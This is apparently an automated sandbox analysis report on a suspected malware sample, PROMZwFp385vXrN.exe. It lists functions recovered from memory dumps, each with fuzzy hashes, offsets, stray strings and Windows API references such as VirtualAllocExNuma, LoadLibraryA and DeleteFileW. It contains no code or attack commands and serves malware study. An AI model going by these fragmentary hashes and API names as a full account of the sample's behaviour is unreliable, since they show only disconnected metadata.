Function 08C35E6A Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a28b50ec30a52dfc1005236fdcde7e347ef4650df6fed1798ec9747a52a102f5
Instruction ID: 2f6190e9ef5d6bded77e4fa9b84a9d82c3fec417a47ebea245af8ec5564ad5ec
Opcode Fuzzy Hash: a28b50ec30a52dfc1005236fdcde7e347ef4650df6fed1798ec9747a52a102f5
Instruction Fuzzy Hash: B7D12A74E042299FDB10DFA9C590AADFBF2BF89305F248299D415AB316D7309E42CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05B7E33F Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ce02907507af68b348efc782d4a33832728378160bd6192528bbdf33a908d0c
Instruction ID: e4d2fb7c6976dc412c14177b0ff69d66918070ab5f1b4a56a1291a39f8443615
Opcode Fuzzy Hash: 2ce02907507af68b348efc782d4a33832728378160bd6192528bbdf33a908d0c
Instruction Fuzzy Hash: CBD1F531C2074A8ACB10EBA4D9A469DB7B1FF95304F50DB9AE44937224EF706AC5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05B7E350 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f9939a4279fbc5edafe81f8e19ec2cecf5352c3e0a549f108ae02640a959697
Instruction ID: a1088ab1a36c299070a936b9cfbe713875c6496b6b4ed88acc3d8d37b1bdb5a3
Opcode Fuzzy Hash: 9f9939a4279fbc5edafe81f8e19ec2cecf5352c3e0a549f108ae02640a959697
Instruction Fuzzy Hash: 92D1F531C2074A8ACB10EBA4D9A469DB7B1FF95304F50DB9AE44937224EF706AC5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0766F2D1 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2bc63c21dffc2772e8fd4836d5193ea37725c709138069ca5d1a8c6de0037a2
Instruction ID: 579e60de2812ea5b9e100bb485fc9090ba722944008b7cde5fd40059f77bc7b2
Opcode Fuzzy Hash: e2bc63c21dffc2772e8fd4836d5193ea37725c709138069ca5d1a8c6de0037a2
Instruction Fuzzy Hash: DF71FF74E152099FCB44CFA9E48499EFBF1FF89310F54816AE419AB224D734AA42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0766F2E0 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b91167fdd37c97f386f163cc0a195d00333c9791a94c7f0c0f1b23357d88d43
Instruction ID: 23771a0c3cd7df0297ee649187468ae6a17a6f383bbd6ea14616139226f35b5f
Opcode Fuzzy Hash: 5b91167fdd37c97f386f163cc0a195d00333c9791a94c7f0c0f1b23357d88d43
Instruction Fuzzy Hash: 0871EE74E152099FCB44CFA9E48499EFBF1FF89310F54816AE419BB224D734AA42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 08C30880 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65be7fbf6654e0f5770d7132423a2cd6289b87600c526c211b917d2085cf6d29
Instruction ID: 8b210253a785b6126cb8aef82d2eab819a04bf6c6638e0ba2da47a84d2db0eed
Opcode Fuzzy Hash: 65be7fbf6654e0f5770d7132423a2cd6289b87600c526c211b917d2085cf6d29
Instruction Fuzzy Hash: F9510475E056198FCB04CFAAD5805EEFBF2FF88211F24942AD405B7314D3309A42CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 08C30890 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c17c8749f907988d2d912e8c314c79e2efff45b003e6b9cc4bd661d2d4bba766
Instruction ID: a16f3d79f042a2905595751a4d11a8425db9c730b6fb2d60a126082be7c7b375
Opcode Fuzzy Hash: c17c8749f907988d2d912e8c314c79e2efff45b003e6b9cc4bd661d2d4bba766
Instruction Fuzzy Hash: 0751E075E01619CFCB08CFAAD5809EEFBF2FB88201F24942AD415B7314D7349A428FA5

Uniqueness

Uniqueness Score: -1.00%

Function 08C38720 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1223be8859f294102397b4b25e426b0d538b5fef194ce69780ffb8febe0a828a
Instruction ID: b3936115e3fd7802ad224e4ca312fe1de5068402b1c1efd87e09e69ccc4271fd
Opcode Fuzzy Hash: 1223be8859f294102397b4b25e426b0d538b5fef194ce69780ffb8febe0a828a
Instruction Fuzzy Hash: 86512C71E1162ACBDB24CF26C840799BBB2EFC9301F04C6B6D51DA7654EB705A868F40

Uniqueness

Uniqueness Score: -1.00%

Function 08C317C8 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70301ab48aefee3e7376107ee5579a899a7bdac5da19f2cfca77e89ffde9b27f
Instruction ID: 3231f7bca75996fb63de88fc1c4b1989741d143f536a7c213c81ae0d4310f9c7
Opcode Fuzzy Hash: 70301ab48aefee3e7376107ee5579a899a7bdac5da19f2cfca77e89ffde9b27f
Instruction Fuzzy Hash: 6F51AC71E016588FDB18CF6B8D4529AFBF3AFC9200F14C1BAD40CAB265EB3409868F51

Uniqueness

Uniqueness Score: -1.00%

Function 08C38712 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf0ed6a19d4bcfaf5d98d6c68986579046b252db2bea3148f756f0986804e910
Instruction ID: c0ccf647f80c7f9d784d2a703ea9f2c105637dea4ba82200754aaf1ede08ea29
Opcode Fuzzy Hash: bf0ed6a19d4bcfaf5d98d6c68986579046b252db2bea3148f756f0986804e910
Instruction Fuzzy Hash: 9C415C75E1062A8BDB28CF66CC44799FBB2FFC9300F14C2BAD509A7654EB705A858F40

Uniqueness

Uniqueness Score: -1.00%

Function 08C30AA9 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6335c0522d9ee8f7ae05e2307345d57702643b1f455614e9e0e2639cf6611e30
Instruction ID: 48d17a9fb5bdec8b9c759878046dee1d3f4adbbe6d953604aefae550912363e4
Opcode Fuzzy Hash: 6335c0522d9ee8f7ae05e2307345d57702643b1f455614e9e0e2639cf6611e30
Instruction Fuzzy Hash: 9741F171E0565ADFCB08CFAAC5815EEFBB2AB88308F24D16AC505B7214D7349A42CF95

Uniqueness

Uniqueness Score: -1.00%

Function 08C30AB8 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b1c31edbf4550ab5a7253376151df1573df5bbcc6319a891e5264d8ebe14464
Instruction ID: 8cb03e5f3eed4264f6394bc526901eaa8871214c3eff5971f0c0573f82c96a54
Opcode Fuzzy Hash: 0b1c31edbf4550ab5a7253376151df1573df5bbcc6319a891e5264d8ebe14464
Instruction Fuzzy Hash: 5741E5B1E1561ADBDB04CFAAC5815EEFBB2AB88308F24D06AC505B7314D7349A42CF95

Uniqueness

Uniqueness Score: -1.00%

Function 08C30660 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b226cfb8b27f69214302441c6a019298bc2385310e0ac1c7aa8c8e013b15aad0
Instruction ID: ade24a6df893fbd04720033581c2b5819f7936d1033c0b2bce1164ec1e897c84
Opcode Fuzzy Hash: b226cfb8b27f69214302441c6a019298bc2385310e0ac1c7aa8c8e013b15aad0
Instruction Fuzzy Hash: 7E4116B5E0561A8FCB48CFAAC5415EEBBF2AB88300F24C46AC415A7254D7349A42CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 08C317E0 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9637a0b05af271a1ae99a1e563a3533518c38b5f9a5909f9cb6fecc393ac0469
Instruction ID: b7acabca6353a26de0fd6e4cc59816b393e05a1f6cb17597818700f41f70ddd6
Opcode Fuzzy Hash: 9637a0b05af271a1ae99a1e563a3533518c38b5f9a5909f9cb6fecc393ac0469
Instruction Fuzzy Hash: CD516971E016188BDB68CF6B9D4579EFAF3BFC8301F14C1BA950CA6254EB341A868F51

Uniqueness

Uniqueness Score: -1.00%

Function 08C30670 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4c5fe52046c9ebb52a58580ef53b2d9b2796be8e492ffafd4161c621ef1f99
Instruction ID: 30e6364f845090a488e648df4fe1f26a1a7d3584edd36f97abe68ed1bfd11946
Opcode Fuzzy Hash: 6f4c5fe52046c9ebb52a58580ef53b2d9b2796be8e492ffafd4161c621ef1f99
Instruction Fuzzy Hash: 7B41E2B1E0561A8FCB48CFAAC5815AEFBF6AB88300F24D42AC415A7354D7349A428F94

Uniqueness

Uniqueness Score: -1.00%

Function 08C30CAE Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10945e04c5e3616a99a32566b474fc5cfa894ed5330ad96af4d24ab7a2f23d6a
Instruction ID: 31eb2cf5f57272612cc2c483679ea6434d63067cb487f25a5bf0b7f5be77136e
Opcode Fuzzy Hash: 10945e04c5e3616a99a32566b474fc5cfa894ed5330ad96af4d24ab7a2f23d6a
Instruction Fuzzy Hash: 8541C8B1E006699FDB58CF6BC944A8EFBF3BF89341F04C1A9D408AB215D7309A468F55

Uniqueness

Uniqueness Score: -1.00%

Function 08C3D808 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13a09a877aaa1a094f27cdcc6a4fbb22586bd26bdf31242c02c9bb07d8429a7b
Instruction ID: 59bfabbe91c5c9ba8697e6da1347249ebf579a58edf4bfd43fd971a4a350e350
Opcode Fuzzy Hash: 13a09a877aaa1a094f27cdcc6a4fbb22586bd26bdf31242c02c9bb07d8429a7b
Instruction Fuzzy Hash: 39114F30C5A328CADB148F66D814BFDBBB9BF4E302F046029D54673741C7746546CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 08C39F90 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 739ec778cd5c45bba850da8ce44377fdfdd465d1fc1a72f9d81f2f7087e93672
Instruction ID: b12bf08ac686f08ebe5b446f9f5d5a9601894d4d53480b759648830006aabb7b
Opcode Fuzzy Hash: 739ec778cd5c45bba850da8ce44377fdfdd465d1fc1a72f9d81f2f7087e93672
Instruction Fuzzy Hash: 20212571E116299BDB48CFABD9416AEFBF7EBC8210F14C02AD508A7354EB305A168F50

Uniqueness

Uniqueness Score: -1.00%

Function 08C34432 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93319ed01f0aacbd86f91d4c0405313a83591c3a74bf623563138e5409d63fc4
Instruction ID: 72e1ce63b4df99e5f1027be7873721379b2f8233d4d9d978c1d8f67a2b23188d
Opcode Fuzzy Hash: 93319ed01f0aacbd86f91d4c0405313a83591c3a74bf623563138e5409d63fc4
Instruction Fuzzy Hash: 53215871E152198BDB58CFAAD8416EEFBF7EFC9210F14C07AD408A7255DB304A028F95

Uniqueness

Uniqueness Score: -1.00%

Function 05B7FBE8 Relevance: 7.8, Strings: 6, Instructions: 263COMMON

Download Yara Rule

Strings

U, xrefs: 05B7FD65
U, xrefs: 05B7FE6C
U, xrefs: 05B7FD2E
U, xrefs: 05B7FD1C
U, xrefs: 05B7FCC8
$%|`, xrefs: 05B7FEF7

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: $%|`$U$U$U$U$U
API String ID: 0-4124922192
Opcode ID: 8028cdb97844b7e5071e3d57d9b9686d1b620f12e6f0af4b721e37ae446efd23
Instruction ID: 0290cd805d179cf974faaca49e04836b0afb5019d86f9aff2563e9ca68e6084b
Opcode Fuzzy Hash: 8028cdb97844b7e5071e3d57d9b9686d1b620f12e6f0af4b721e37ae446efd23
Instruction Fuzzy Hash: 1791FE357046148FCB18AB78D41867E77A7EFC9704F1080ADE41A9B3A1DF35EC028B95

Uniqueness

Uniqueness Score: -1.00%

Function 05B70BC0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

{`, xrefs: 05B70BCC
{`, xrefs: 05B70BF2
{`, xrefs: 05B70BD6
{`, xrefs: 05B70BFE

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: {`${`${`${`
API String ID: 0-1631614474
Opcode ID: dff7878dac2058d7e234c7ca533e921b42fd51dae1b84fd431df7dd1159b149d
Instruction ID: 8dec84e7648bc9401073a3f68814419acd42cdc26196c33435c3dfd69de6e934
Opcode Fuzzy Hash: dff7878dac2058d7e234c7ca533e921b42fd51dae1b84fd431df7dd1159b149d
Instruction Fuzzy Hash: 7701483175411D8F8724AE39C54893AB3EAFB9976472981EBE422CB370EA70EC41CB51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: PROMZwFp385vXrN.exePID: 1788, Parent PID: 5444COMMON

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.8%
Total number of Nodes:	107
Total number of Limit Nodes:	9

Executed Functions

Function 06D36AC8 Relevance: 1.7, APIs: 1, Instructions: 180
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06D36B09

Memory Dump Source

Source File: 00000011.00000002.643776327.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6d30000_PROMZwFp385vXrN.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d7a6142d038cb62df1997520b09b3c18b357a4d13e2a4dd24e63f5790415643f
Instruction ID: a310240779ccc3f5e002f6cfc4a7de16bee62778b51d79856154955e577e19b1
Opcode Fuzzy Hash: d7a6142d038cb62df1997520b09b3c18b357a4d13e2a4dd24e63f5790415643f
Instruction Fuzzy Hash: F9613C30E01615EFDB58EFB4E4587AEBBF2EF84305F148429E412AB294DB79D845CB90

Uniqueness

Uniqueness Score: -1.00%

Function 061B8582 Relevance: 1.8, APIs: 1, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 061B8651

Memory Dump Source

Source File: 00000011.00000002.641999164.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_61b0000_PROMZwFp385vXrN.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 51bb494bca60e76930bd2f5680016e3046f59a387d70c00ec82ae7632df41e67
Instruction ID: 5f8c9d3fdde5319a6476da5d1ce64d963164e85404ba10bfdd22e6aa0d8fed1b
Opcode Fuzzy Hash: 51bb494bca60e76930bd2f5680016e3046f59a387d70c00ec82ae7632df41e67
Instruction Fuzzy Hash: C202B374901268CFCBA9DF30D898699B7B2BF5A306F1045E9E90AA2350CF359EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 061B85A3 Relevance: 1.8, APIs: 1, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 061B8651

Memory Dump Source

Source File: 00000011.00000002.641999164.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_61b0000_PROMZwFp385vXrN.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 99d48ea9fa30fa60af5947ac6ba3c5457bc2c5657a6df7233757c4fd2e0f4c16
Instruction ID: f85795658833bf033d21bc0b49184869cac3dc72e2dc5a0a5583e65a469242a2
Opcode Fuzzy Hash: 99d48ea9fa30fa60af5947ac6ba3c5457bc2c5657a6df7233757c4fd2e0f4c16
Instruction Fuzzy Hash: 0602B374901268CFCBA9DF70D898699B7B2BF5A306F1045E9E90AA2350CF359EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 061B85E8 Relevance: 1.8, APIs: 1, Instructions: 340
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 061B8651

Memory Dump Source

Source File: 00000011.00000002.641999164.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_61b0000_PROMZwFp385vXrN.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cbaba87a67cc390dec7d6bc152d7bf8eccc9a7637f227d921ac5d5db8af9e019
Instruction ID: 3bd28d1b771ad1c68ecf011d70ee49ff4be3eebb5e04ac9d2f53c0ebce840841
Opcode Fuzzy Hash: cbaba87a67cc390dec7d6bc152d7bf8eccc9a7637f227d921ac5d5db8af9e019
Instruction Fuzzy Hash: F202C374901268CFCBA9DF70D898699B7B2BF5A306F1045E9E90AA2350CF359EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 061B862D Relevance: 1.8, APIs: 1, Instructions: 333
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 061B8651

Memory Dump Source

Source File: 00000011.00000002.641999164.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_61b0000_PROMZwFp385vXrN.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c65ceb17ea4417ed4bcb0847f575fab215bada018812888985d242f5a1c24456
Instruction ID: 82d948da85d18a78a3c65c92da912cca77070266d5d68cb3dcad955becd6b681
Opcode Fuzzy Hash: c65ceb17ea4417ed4bcb0847f575fab215bada018812888985d242f5a1c24456
Instruction Fuzzy Hash: 8E02B374901268CFCBA9DF70D888699B7B2BF5A306F1045E9E90AA2350CF359EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 015A0868 Relevance: 1.8, APIs: 1, Instructions: 262
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 015A0B0E

Memory Dump Source

Source File: 00000011.00000002.619812127.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_15a0000_PROMZwFp385vXrN.jbxd

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: 22cc4491434b55b17f85b4683b58c1ec4a5b5da1ce435e46e850c0827eae97ca
Instruction ID: 3e48836f2e96e8f64c31de83b0d876b6d435215df5a2f0fb235a9db9879ce875
Opcode Fuzzy Hash: 22cc4491434b55b17f85b4683b58c1ec4a5b5da1ce435e46e850c0827eae97ca
Instruction Fuzzy Hash: 0E81E171E502488FDF11CFA9D8907ADBBF0FB49320F60856AE409EB391D7349845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 061B74C0 Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.641999164.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_61b0000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5892b71b4eae099987ca00c85f3c631d6841ae46c80e235f33b09b81cd5071e
Instruction ID: e6e56768e0f9170bb20496f25b5809d8223612ed0710fc293c1230477db787e2
Opcode Fuzzy Hash: e5892b71b4eae099987ca00c85f3c631d6841ae46c80e235f33b09b81cd5071e
Instruction Fuzzy Hash: CC519170E0424A8FDB50DBA9D8107EEBBF5EF89310F14847AD518EB381EB349905CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 06D36A69 Relevance: 1.6, APIs: 1, Instructions: 93
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06D36B09

Memory Dump Source

Source File: 00000011.00000002.643776327.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6d30000_PROMZwFp385vXrN.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cd8fe69e88c718fd0fbf07cead58cd8cab5d639b818331acc6135fa9ac649a33
Instruction ID: a664d9d768450808af81daae83bc1a859ecf0f0ed65542d48cf4bddab36af1fa
Opcode Fuzzy Hash: cd8fe69e88c718fd0fbf07cead58cd8cab5d639b818331acc6135fa9ac649a33
Instruction Fuzzy Hash: 7C31C130A01395AFDB45DFB4D858AAEBBB2EF85304F21847AE404AB251D776D845CB90

Uniqueness

Uniqueness Score: -1.00%

Function 015AB794 Relevance: 1.6, APIs: 1, Instructions: 89
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 015AD7A2

Memory Dump Source

Source File: 00000011.00000002.619812127.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_15a0000_PROMZwFp385vXrN.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d989dfbf0aeaa75fa75d557f2c384fea8b4b00e86d531e9fd4f2588a06291362
Instruction ID: ce9c1713827ecc6a114e3cdc5ab4327528f74367342164cedc8fa525df855fe8
Opcode Fuzzy Hash: d989dfbf0aeaa75fa75d557f2c384fea8b4b00e86d531e9fd4f2588a06291362
Instruction Fuzzy Hash: 943131B0D002898FDB18EFA9C8857AEBFF1BB08314F148529E815AB680E7749845CF95

Uniqueness

Uniqueness Score: -1.00%

Function 015AD6CD Relevance: 1.6, APIs: 1, Instructions: 89
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 015AD7A2

Memory Dump Source

Source File: 00000011.00000002.619812127.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_15a0000_PROMZwFp385vXrN.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 79a1c321270ab833bac8cec6e4c638ce67a4d26a87ef981e7065a637cc2f5baa
Instruction ID: 44c559cd5ff62e9f5e9f73af998a2e8c1480bd528b6e3bf2ee699767c27c66ab
Opcode Fuzzy Hash: 79a1c321270ab833bac8cec6e4c638ce67a4d26a87ef981e7065a637cc2f5baa
Instruction Fuzzy Hash: 593114B4D102898FDB18DFA8C4857AEBFF1FB48314F148529E815EB680D7749446CF51

Uniqueness

Uniqueness Score: -1.00%

Function 061B75B0 Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,061B7545), ref: 061B7628

Memory Dump Source

Source File: 00000011.00000002.641999164.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_61b0000_PROMZwFp385vXrN.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: a263b8f754c537477527b1801ba5966d242497f710ca4fe69c8ddc172ce96c83
Instruction ID: c0a681cb40f1fe53a73e6fea67fb0c80326284a5c889c9e8f521e830fcf5b3cd
Opcode Fuzzy Hash: a263b8f754c537477527b1801ba5966d242497f710ca4fe69c8ddc172ce96c83
Instruction Fuzzy Hash: 7F2135B1C0065A9FCB10CFAAC4447EEFBF4EF48324F14852AD854A7240E734A945CFA1

Uniqueness

Uniqueness Score: -1.00%

